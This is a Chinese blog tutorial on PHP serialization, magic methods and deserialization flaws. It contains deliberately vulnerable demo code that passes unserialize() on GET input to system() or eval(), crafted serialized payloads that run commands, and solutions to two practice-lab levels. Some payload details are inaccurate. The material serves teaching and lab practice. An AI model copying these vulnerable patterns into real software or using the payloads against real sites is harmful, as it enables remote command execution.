PHP反序列化&魔术方法

已于 2022-07-30 17:13:28 修改
阅读量865 收藏 8
点赞数 6
分类专栏: web渗透 文章标签: php 开发语言
于 2022-06-17 11:46:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54882883/article/details/125330749
版权

什么是反序列化和序列化

在这里插入图片描述

蓝易云高性能服务器

在这里插入图片描述|

|

|

|

|

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

|

|

|

|

|

序列化:其实就是对象转为数组或者字符串的格式

反序列化:就是将数组或者字符串转换成对象

我打个比方你简单的理解一下

15进行序列化就等于5+5+5

三个5相加结果是不变的但是等于15

反序列化呢

5+5+5反序列化为15

序列化就是把一个对象拆分好几块,

反序列化就是把碎片组合在一起形成一个对象

serialize()     //将一个对象转换成一个字符串
unserialize()   //将字符串还原成一个对象

PhP魔术方法【重点-要背一下】

__construct(): //构造函数,当对象new的时候会自动调用

__destruct()://析构函数当对象被销毁时会被自动调用

__wakeup(): //unserialize()时会被自动调用

__invoke(): //当尝试以调用函数的方法调用一个对象时,会被自动调用

__call(): //在对象上下文中调用不可访问的方法时触发

__callStatci(): //在静态上下文中调用不可访问的方法时触发

__get(): //用于从不可访问的属性读取数据

__set(): //用于将数据写入不可访问的属性

__isset(): //在不可访问的属性上调用isset()或empty()触发

__unset(): //在不可访问的属性上使用unset()时触发

__toString(): //把类当作字符串使用时触发

__sleep(): //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用

序列化漏洞演示

<?php
//class就是一个定义类的,你可以理解为定义一个对象用的,格式是class 对象名称{对象的内容类的属性和方法}
//这个demotest就是是定义的对象名称
    class demotest{
        //public关键字表示属性或方法是公开可见的。
        //同时这也是面向对象语言通用的一种声明方式。
        //public: 公开可见[就是公开可见的信息,这个公开课件不是直接F12就可以看见的]
        //protected: 对象内部可见 (该对象的子对象同样可以访问)
        //;private: 对象自身内部可见 (不包含该对象的子对象,或者说private属性和方法不会被继承)

    public $name='odw';//名称=odw
    public $max='man';//性别=男
    public $age='18';//年龄=18//如果18不加单引号就是数字int类型,输出就是i:18
}
$example=new demotest();//这里就是实例化了,new他的作用就是实例化的,格式就是new+实例化对象,将实例化完的值给到变量$example
$s=serialize($example);//序列化,这里就是序列化了,serialize就是序列化的函数,格式也非常简单serialize(实例化完的对象),然后将序列化后把值赋值到$s

echo $s.'<br>';
//最后这里就是输出我们序列化后的对象了
    ?>

在这里插入图片描述

序列化:对象转换成字符串
序列化后形成字符串
O:8:"demotest":3:{s:4:"name";s:3:"odw";s:3:"max";s:3:"man";s:3:"age";s:2:"18";}

解释

O:8:"demotest":3:{s:4:"name";s:3:"odw";s:3:"max";s:3:"man";s:3:"age";s:2:"18";}

第一个
O他就是等于object的缩写【object意思?--object=对象的意思】
第二个
8代表长度,他代表的是对象名称的长度,demotest就是对象名称
第三个
demotest就是对象名称
第四个
3,3是什么呢,3代表这个demotest这个对象里面有三个public变量/或者说对象里面有三个变量
第五个
s他其实就是string的缩写【string意思就是字符串类型的意思】,所以说string字符串的意思
第六个
4,这个4是长度的意思,那个的长度呢,表示的是demotest对象里面第一个变量名称的长度,第一个变量是$name所以长度是4
第七个
name,这个就是demotest对象中第一个变量的名称
第八个
s他其实就是string的缩写【string意思就是字符串类型的意思】,所以说string字符串的意思
第九个
3 这个3是长度的意思,那个的长度呢,表示的是demotest对象里面第一个变量对应值,第一个变量$name=odw值是三个字母所以长度是3
第十个
odw,这个就是demotest对象中第一个变量$name=odw值中的odw这个值
第十一
s他其实就是string的缩写【string意思就是字符串类型的意思】,所以说string字符串的意思
第十二
3 这个3是长度的意思,那个的长度呢,表示的是demotest对象里面第二个变量名称的长度,第二个变量是$odw所以长度是3
第十三
max,这个就是demotest对象中第二个变量的变量名称
第十四
s他其实就是string的缩写【string意思就是字符串类型的意思】,所以说string字符串的意思
第十五
3 这个3是长度的意思,那个的长度呢,表示的是demotest对象里面第二个变量对应值,第一个变量$max=man值是三个字母所以长度是3
第十六
man 这个就是demotest对象中第二个变量$max=man值中的man这个值
第十七
s他其实就是string的缩写【string意思就是字符串类型的意思】,所以说string字符串的意思
第十八
3 这个3是长度的意思,那个的长度呢,表示的是demotest对象里面第三个变量名称的长度,第三个变量是$ahe所以长度是3
第十九
age 这个就是demotest对象中第三个变量的变量名称
第二十
s他其实就是string的缩写【string意思就是字符串类型的意思】,所以说string字符串的意思
第二十一
2这个2是长度的意思,那个的长度呢,表示的是demotest对象里面第三个变量对应值,第三个变量$age=18值18 两个数字所以为2
第二十二
18 这个就是demotest对象中第三个变量$age=18值中的18这个值

img

序列化安全问题

<?php
//class 定义一个对象A
    class A{
        //public 意思就是能够背外部引用
    public $var='echo test';//这里设置一个变量$var 变量里面的值是'echo test';
    public function test(){//这里再通过function去自定义一个函数,定义的函数名称为test
        echo $this->var;//这个也非常简单就是输出$var
    }
    //这里有一个判断魔术方法的小技巧,看下划线__destruct()一般有两条下划线的可能就是魔术方法
    //__destruct()://析构函数当对象被销毁时会被自动调用

    public function __destruct(){
        echo 'x'.'<br>';
    }
    //我们来看看__construct()这个魔术方法怎么用--__construct(): //构造函数,当对象new的时候会自动调用
    //也是就是说啊当对象背new的时候就会触发魔术方法
    //$a=new A();
    public function __construct(){
        echo '__construct'.'<br>';
    }
    public function __toString(){
        return '__toString'.'<br>';
    }
}


$a=new A();

?>

在这里插入图片描述

为什么会输出

__construct 和x呢

首先我们魔术方法的触发条件

__construct(): //构造函数,当对象new的时候会自动调用

__destruct()://析构函数当对象被销毁时会被自动调用

第一个是当对象被new调用的时候触发

第二个是当对象被销毁的时候触发

这里解释一样,第二个,我们没有销毁对象为什么会触发呢,这里说一下,基本情况下,当代码结束会自动销毁对象,

所以是只要代码中有__destruct()这个魔术方法,代码调用对象执行完就会触发这个魔术方法

第二种序列化安全问题

<?php
//class 定义一个对象A
    class A{
        //public 意思就是能够背外部引用
    public $var='echo test';//这里设置一个变量$var 变量里面的值是'echo test';
    public function test(){//这里再通过function去自定义一个函数,定义的函数名称为test
        echo $this->var;//这个也非常简单就是输出$var
    }
    //这里有一个判断魔术方法的小技巧,看下划线__destruct()一般有两条下划线的可能就是魔术方法
    
    public function __destruct(){
        echo 'x'.'<br>';
    }
    //我们来看看__construct()这个魔术方法怎么用--__construct(): //构造函数,当对象new的时候会自动调用
    //也是就是说啊当对象背new的时候就会触发魔术方法
    //$a=new A();
    public function __construct(){
        echo '__construct'.'<br>';
    }
    public function __toString(){
        return '__toString'.'<br>';
    }
}



//无需函数,创建对象触发魔术方法
$a=new A();//触发__construct


echo serialize($a).'<br>';

    ?>

和第一个差不多

O:1:"A":1:{s:3:"var";s:9:"echo test";}

在这里插入图片描述

第三种序列化安全问题

<?php
//class 定义一个对象A
    class A{
        //public 意思就是能够背外部引用
    public $var='echo test';//这里设置一个变量$var 变量里面的值是'echo test';
    public function test(){//这里再通过function去自定义一个函数,定义的函数名称为test
        echo $this->var;//这个也非常简单就是输出$var
    }
    //这里有一个判断魔术方法的小技巧,看下划线__destruct()一般有两条下划线的可能就是魔术方法
    
    public function __destruct(){
        echo 'x'.'<br>';
    }
    //我们来看看__construct()这个魔术方法怎么用--__construct(): //构造函数,当对象new的时候会自动调用
    //也是就是说啊当对象背new的时候就会触发魔术方法
    //$a=new A();
    public function __construct(){
        echo '__construct'.'<br>';
    }
    public function __toString(){
        return '__toString'.'<br>';
    }
}




$t=unserialize($_GET['x']);//unserialize是反序列化
    ?>

当通过x=O:1:"A":1:{s:3:"var";s:9:"echo test";}去反序列化的时候

在这里插入图片描述

执行出现x

在这里插入图片描述

为什么呢

很简单我前面大比分说了15和5+5+5是一样的

对象A 序列化就是O:1:“A”:1:{s:3:“var”;s:9:“echo test”;}

当我们调用O:1:“A”:1:{s:3:“var”;s:9:“echo test”;}就是调用对象A

当反序列化执行完,代码自动销毁达到了魔法方法destruct()的条件

<?php
//class 定义一个对象A
    class A{
        //public 意思就是能够背外部引用
    public $var='echo test';//这里设置一个变量$var 变量里面的值是'echo test';
    public function test(){//这里再通过function去自定义一个函数,定义的函数名称为test
        echo $this->var;//这个也非常简单就是输出$var
    }
    //这里有一个判断魔术方法的小技巧,看下划线__destruct()一般有两条下划线的可能就是魔术方法
    
    public function __destruct(){
        echo 'x'.'<br>';
    }
    //我们来看看__construct()这个魔术方法怎么用--__construct(): //构造函数,当对象new的时候会自动调用
    //也是就是说啊当对象背new的时候就会触发魔术方法
    //$a=new A();
    public function __construct(){
        echo '__construct'.'<br>';
    }
    public function __toString(){
        return '__toString'.'<br>';
    }
}




$t=unserialize($_GET['x']);
//这个就是$t执行了也会去执行下面的$t->test()函数
$t->test();
    ?>

第四种序列化安全问题

<?php
//class 定义一个对象A
    class A{
        //public 意思就是能够背外部引用
    public $var='echo test';//这里设置一个变量$var 变量里面的值是'echo test';
    public function test(){//这里再通过function去自定义一个函数,定义的函数名称为test
        echo $this->var;//这个也非常简单就是输出$var
    }
    //这里有一个判断魔术方法的小技巧,看下划线__destruct()一般有两条下划线的可能就是魔术方法
    
    public function __destruct(){
        echo 'x'.'<br>';
    }
    //我们来看看__construct()这个魔术方法怎么用--__construct(): //构造函数,当对象new的时候会自动调用
    //也是就是说啊当对象背new的时候就会触发魔术方法
    //$a=new A();
    public function __construct(){
        echo '__construct'.'<br>';
    }
    public function __toString(){
        return '__toString'.'<br>';//__toString(): //把类当作字符串使用时触发

    }
}



$a=new A();//触发__construct
//这里用echo $a; 这是以字符串格式输出会触发魔术方法__toString()
//当我们 把echo '$a'; 加上单引号就是int类型,就不会触发__toString()
echo $a;//触发__toString

    ?>

在这里插入图片描述

在这里插入图片描述

操作起来

漏洞出现1

<?php
//class 定义一个对象A
    class A{
        //public 意思就是能够背外部引用
    public $var='echo test';//这里设置一个变量$var 变量里面的值是'echo test';
    public function test(){//这里再通过function去自定义一个函数,定义的函数名称为test
        echo $this->var;//这个也非常简单就是输出$var
    }
    //这里有一个判断魔术方法的小技巧,看下划线__destruct()一般有两条下划线的可能就是魔术方法
    
    public function __destruct(){
        system ('ipconfig');//改成以sysem权限去执行ipconfig
    }
    //我们来看看__construct()这个魔术方法怎么用--__construct(): //构造函数,当对象new的时候会自动调用
    //也是就是说啊当对象背new的时候就会触发魔术方法
    //$a=new A();
    public function __construct(){
        echo '__construct'.'<br>';
    }
    public function __toString(){
        return '__toString'.'<br>';
    }
}



//无需函数,创建对象触发魔术方法
$a=new A();//触发__construct

    ?>

在这里插入图片描述

漏洞出现2

<?php
//class 定义一个对象A
    class A{
        //public 意思就是能够背外部引用
    public $cmd='ipconfig';
    public function test(){//这里再通过function去自定义一个函数,定义的函数名称为test
        echo $this->cmd;//这个也非常简单就是输出$cmd
    }
    //这里有一个判断魔术方法的小技巧,看下划线__destruct()一般有两条下划线的可能就是魔术方法
    
    public function __destruct(){
        system ($this->cmd);//这里就是执行$cmd,$cmd的值是ipconfig,简而言之就是执行ipconfig
    }
    //我们来看看__construct()这个魔术方法怎么用--__construct(): //构造函数,当对象new的时候会自动调用
    //也是就是说啊当对象背new的时候就会触发魔术方法
    //$a=new A();
    public function __construct(){
        echo '__construct'.'<br>';
    }
    public function __toString(){
        return '__toString'.'<br>';
    }
}



//无需函数,创建对象触发魔术方法
$a=new A();//触发__construct

    ?>

在这里插入图片描述

漏洞出现3

<?php
class A{
    public $cmd='ipconfig';
    public function __destruct()
    {
        system($this->cmd);
    }
    public function __construct()
    {
        echo '123'.'<br>';
    }
}

//函数引用,无对象创建接触魔术方法自定义变量
//
unserialize($_GET['x']);
?>

我们这次就自己搞一个序列化的字符串让网站对我的字符串进行反序列化

按照要去来
1
O他就是等于object的缩写【object意思?--object=对象的意思】
2
A对象名称长度为1
3
A对象名称
4
1有对象里面有一个变量
5
s表示字符串类型
6
3第一个变量名为cmd三个字母
7
cmd第一个变量的名称
8
s字符串类型,这给字符串类型是变量执行的类型,上一个字符串类型是变量名称的
9
8表示变量值等于多少位
10
ipconfig 表示$cmd=对应的值为ipconfig

那么我们将上面的合成就是

O:1:"A":1:{s:3:"cmd";s:8:"ipconfig";}

在这里插入图片描述

我们试试把ipconfig改成www.baidu.com

O:1:"A":3:{s:3:"cmd";s:18:"ping www.baidu.com";}

空格和点都算占一位

在这里插入图片描述

靶场

https://github.com/fine-1/php-SER-libs

在这里插入图片描述

1

<?php
highlight_file(__FILE__);
class a{
    var $act;
    function action(){
        eval($this->act);
    }
}
$a=unserialize($_GET['flag']);//反序列化来自flag的数据
$a->action();//执行$a并执行action()
?>

这个就是需要我们自己构造字符串
O:1:"a":1:{s:3:"act";s:24:"show_source('flag.php');";}

在这里插入图片描述

show_source就是高亮显示flag.php内容

你不想拿flag.php内容

用cat flag.php也可以

O:1:"a":1:{s:3:"act";s:12:"cat flag.php";}

在这里插入图片描述

2

在这里插入图片描述

这关比较简单

<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
            //只要反序列化user=="daydream" and $this->pass=="ok"就可以了
            
        }
    }
}
$a=unserialize($_GET['param']);
if($a->login())
{
    echo $flag;
}
?> 

O:7:"mylogin":2:{s:4:"user";s:8:"daydream";s:4:"pass";s:2:"ok";}

在这里插入图片描述
在这里插入图片描述

无聊的知识
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
详解PHP序列化反序列化的方法
12-19
经常看到一些配置文件里面存放的是一些类似带有格式的变量名称和值,其实就是一个序列化的过程,在需要用到这些数据库的进行一个反序列化过程,就是将这个字符串再还原成他原来的数据结构。下面说说php 如何进行数据的序列化和反序列化的。 php 将数据序列化和反序列化其实就用到两个函数,serialize 和unserialize。 serialize 将数组格式化成有序的字符串 unserialize 将数组还原成数组 例如: $user=array('Moe','Larry','Curly'); $user=serialize($stooges); echo '<pre>'; print_
ThinkPHP中__initialize()和类的构造函数__construct()用法分析
企业级技术与网站app运营
03-08 1221
所以,ThinkPHP中的__initialize()的出现只是方便程序员在写子类的候避免频繁的使用parent::__construct(),同正确的调用框架内父类的构造器,所以,我们在ThnikPHP中初始化子类的候要用__initialize(),而不用__construct(),当然你也可以通过修改框架将__initialize()函数修改为你喜欢的函数名.分享给大家供大家参考。thinkphp中的__construct是不可以随便用的,因为你的模块类继承上级类,上级类有定义好的;
PHP自学笔记14--判断输入中符合条件的字符数
shi_ly的专栏
12-06 396
PHP持续学习中。 判断字符数其实很简单,用strlen()就可以了。 这里要说的是使用正则表达式,符合条件的字符数。换行啦(换行算两个字符),空白符啦,全都给你算上。 代码如下: 1,文件1,用于输入 <?php $html=<<<start1 <html> <head> <script type="text/javasc...
PHP的序列化和反序列化
一颗小白菜的博客
08-17 532
PHP程序执行结束以后将文件中的变量和内容释放掉, 如果一个程序想要的调用之前程序的变量,但是之前的程序已经执行完毕,所有的变量和内容都被释放,那该如何操作呢?这候就可以通过序列化和反序列化保存程序中的对象,给其他程序使用。php序列化可以将对象转换成字符串,但只序列化属性,不序列化方法。unserialize()函数的变量可控,php文件中存在可利用的类,类中有魔法函数。[网鼎杯 2020 青龙组]AreUSerialz(BUUCTF)​PHP用序列化和反序列化函数达到序列化和反序列化的目的。...
php反序列化及__toString()
sinat_31884905的博客
02-21 3307
主要两个文件 index.php <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; if(preg_match("/f1a9/",$file)){ e
PHP反序列化漏洞之魔术方法
weixin_45954730的博客
07-22 966
PHP魔术方法(Magic Methods)是一组特殊的方法,它们在特定的情况下自动调用,用于实现对象的特殊行为或提供额外功能。本文详细介绍每一个魔术方法的触发机、功能、参数以及返回值。这一点是在学习 PHP 反序列化漏洞中最重要的。
反序列化魔术方法的浅学习
quan9i的博客
05-13 2180
前言 学习反序列化,那么就需要首先掌握魔术方法的使用,本篇文章将尽可能详细的讲解反序列化魔术方法,博主只是小白,如有问题还请各位师傅多多指点! 魔术方法 常见魔术方法有以下几种 __construct: 在创建对象候初始化对象,一般用于对变量赋初值。 __destruct: 和构造函数相反,当对象所在函数调用完毕后执行。 __call:当调用对象中不存在的方法自动调用该方法。 __get():获取对象不存在的属性执行此函数。 __set():设置对象不存在的属性执行此函数。 __toString
php+反序列化代码执行漏洞,PHP反序列化漏洞
weixin_30444517的博客
03-11 261
0x001 漏洞产生原理在反序列化的过程中自动触发了某些魔术方法。未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致XSS、代码执行、文件写入、文件读取等不可控后果。0x002 漏洞触发条件一般只能通过代码审计的方式挖掘该漏洞,寻找代码中unserialize()函数的变量可控,且PHP文件代码中存在可利用的类,同类中具有魔术方法。0x003 PHP魔术方法__cons...
2023年安徽省大学生网络安全攻防赛
weixin_45906533的博客
10-15 230
2023年安徽省大学生网络安全攻防赛
反序列化漏洞学习
Wawyw's Blog
06-28 442
1、序列化与反序列化概述 什么是序列化与反序列化? 序列化(serialize):将对象转换为字符串 反序列化(unserialize):将字符串转换为对象 序列化机制出现的意义 php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。 简单例子 <?php class Students{ public $name,$age; public functio
解析PHP多种序列化与反序列化的方法
12-17
1. serialize和unserialize函数这两个是序列化和反序列化PHP中数据的常用函数。复制代码 代码如下:<?php$a = array(‘a’=> ‘Apple’ ,’b’ => ‘banana’, ‘c’ => ‘Coconut’);//序列化数组$s = serialize...
php json与xml序列化/反序列化
10-26
在WEB开发中,php对象的序列化与反序列化经常使用,比较主流的有json格式与xml格式的序列化与反序列化。今天我们就来看看是如何用的。
详解PHP序列化和反序列化原理
10-18
本篇文章给大家分享了下PHP反序列化漏洞系列之PHP序列化和反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
PHP多种序列化/反序列化的方法详解
12-20
摘要:序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的候把...这两个是序列化和反序列化PHP中数据的常用函数。 <?php $a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut');
TCP相关问题总结
最新发布
qq_62835094的博客
04-23 1082
假设TCP是两次握手,则可能发生以下情况客户端发起TCP握手,向服务器发送SYN,但该数据因网络波动滞留此触发超重传,重新简历TCP连接当新建立的连接断开后,之前在网络中滞留的SYN连接请求传递到服务端,服务端误以为客户端需要建立TCP连接,因此发送SYN+ACK请求,并进入连接建立状态,但客户端并不需要建立连接,不发送数据,因此造成服务端资源的浪费三次握手可以防止客户端无效连接信息再次到达服务器,导致重新连接之所以需要四次挥手,因为半关闭tcp通道允许双方互相发送数据,数据是双向流动的。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志
ALex_zry的博客
04-22 469
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 722
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 533
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实导航、实错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
php间人性化展示
赛时科技
04-22 138
函数,用于将间戳转换为人性化的间差。该函数遍历了不同的间单位,找到合适的单位来表示间差,并返回相应的字符串。这样,你就可以根据需要将间以人性化的方式展示给用户了。你可以根据具体需求调整间格式和单位。函数将其格式化为"年-月-日 :分:秒"的形式。然后,我们定义了一个。在上面的示例中,我们首先获取了当前的间戳,并使用。函数来实现间的人性化展示。函数将"-2 days"转换为间戳),然后调用。最后,我们假设有一个过去的间戳(这里使用。函数将其转换为人性化的间差,并输出结果。
php反序列化pop链
10-17
POP链是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__destruct()的特性,通过构造一条对象引用链,使得在对象反序列化,依次调用每个对象的__wakeup()和__destruct()方法,从而实现攻击目的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无聊的知识

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值